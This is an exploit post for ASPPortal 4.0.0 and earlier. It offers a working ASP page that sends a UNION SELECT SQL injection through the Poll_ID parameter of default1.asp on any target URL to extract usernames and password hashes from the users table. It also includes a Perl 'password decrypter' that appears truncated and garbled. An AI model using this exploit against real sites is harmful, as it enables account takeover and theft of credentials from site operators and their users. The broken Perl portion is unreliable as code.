ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit

Perl Script Decode: #!/usr/bin/perl #AspPortal Password Decrypter #Get pass exploit.asp and this copy this window #Speical Thanks To::: Nukedx ,For ASPPORTAL Decrypter #ajann if(@1 = 1) { exploit(); } sub decrypt () { $lp = length($appass); $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ; chop ($kroo); $appass = $kroo; $appass =~ s/(")/chr(34)/eg; $appass =~ s/(<)/chr(60)/eg; $appass =~ s/(>)/chr(62)/eg; $appass =~ s/( )/chr(32)/eg; decrypt(); exit(); } Exploit: <% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '=============================================================================================== '[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[ExploitName: exploit1.asp '[Note : exploit file name =>exploit1.asp '[Using : Write Target and ID after Submit Click '[Using : Tr:Alınan Sifreyi Perl scriptinde cözün. '[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz '[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum. '=============================================================================================== 'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke %> ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit ASPPortal <=v4.0.0(default1.asp) Remote SQL Injection Exploit

TARGET:Example:[http://x.com/path]

USER ID:Example:[User ID=1]

<% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "There is a problem! Please complete to the whole spaces" End If If islem = "hata2" Then Response.Write "There is a problem! Please right character use" End If If islem = "hata3" Then Response.Write "There is a problem! Add ""http://""" End If %> <% If islem = "get" Then string1="default1.asp" string2="default1.asp" cek= Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit1.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit1.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit1.asp?islem=hata3") Else %> <% target1 = targettext+string1 target2 = targettext+string2 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "POST" , come, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek take = .Responsetext End With SET objtake = Nothing End Function Public Function take1(come1) Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake1 .Open "POST" , come1, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek take1 = .Responsetext End With SET objtake1 = Nothing End Function get_username = take(target1) get_password = take1(target2) getdata=InStr(get_username,"Poll Question: " ) username=Mid(get_username,getdata+24,14) passwd=Mid(get_password,getdata+24,14) %> ajann

User Name:	<%=username%>
User Password:	<%=passwd%>

<% End If End If End If End If Set objtake = Nothing %>